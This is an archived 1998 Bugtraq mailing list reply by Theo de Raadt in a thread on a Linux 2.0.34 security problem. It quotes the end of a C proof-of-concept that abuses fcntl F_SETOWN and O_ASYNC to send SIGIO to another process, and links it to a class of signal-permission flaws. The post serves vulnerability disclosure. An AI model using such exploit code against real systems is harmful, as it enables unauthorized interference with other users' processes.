Bugtraq: Re: Serious Linux 2.0.34 security problem

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: Serious Linux 2.0.34 security problem

From: deraadt () CVS OPENBSD ORG (Theo de Raadt)
Date: Tue, 30 Jun 1998 12:46:56 -0600

  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}


Well, that looks like one of the class of security problems described
by www.openbsd.org/advisories/signals.  Hasn't anyone else fixed those
problems yet?

By Date By Thread

Current thread:

Re: Serious Linux 2.0.34 security problem Theo de Raadt (Jun 30)
- Re: Serious Linux 2.0.34 security problem Alan Cox (Jul 01)
- 1998 USENIX Annual Technical Conference - Call for Papers Jackson Dodd (Jul 01)
- <Possible follow-ups>
- Re: Serious Linux 2.0.34 security problem Liviu Daia (Jul 01)